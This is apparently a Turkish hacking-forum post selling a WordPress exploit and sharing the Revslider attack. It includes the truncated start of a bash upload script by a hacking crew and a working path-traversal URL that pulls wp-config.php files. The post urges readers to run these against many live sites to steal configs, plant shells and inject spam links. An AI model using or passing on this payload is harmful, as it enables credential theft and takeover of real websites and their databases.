Satılık exploit 10 binlerce wordpress sitede vardır aralarında güzel da pa lı site olmak üzere her domainden site bulunur.
(Açığın yer aldığı sitelerde market,forum,şirketler vb..)
sadece açığın yer aldığı bir sitenin sunucusu;
Exploit bana aittir
(ister backlink hacklink olarak kullanın...
boşu boşuna dakikalarınızı harcayıp shell atmakla uğraşmanıza hiç gerek yok öyle değil mi?
*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
Bildiğiniz üzere wordpress veri tabanlarında userler için özel şifreleme vardır (Salt) yani bu durumda sistemde kasma olur ve aşırı yükleme olursa veritabanı çöker.
Bu exploiti bir kaç kişi açıtığınızı var sayarsak veritabanının çökmesine neden olacaktır.
Exploit: http://link.tl/1xJHv
Wordpress Revslider Exploit ( old exploit , but still have a lot sites with that POC )
!/bin/bash
#coded = Gantengers Crew
#Please download the file first revslider.zip
UploadREV(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U...
Sitelerin sonuna aşağıdaki url yi ekleyin configleri toplayın , birçok sitede açık aktif şekilde durmaktadır.
100 sitede deneseniz en az 20 tane config alırsınız.
wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php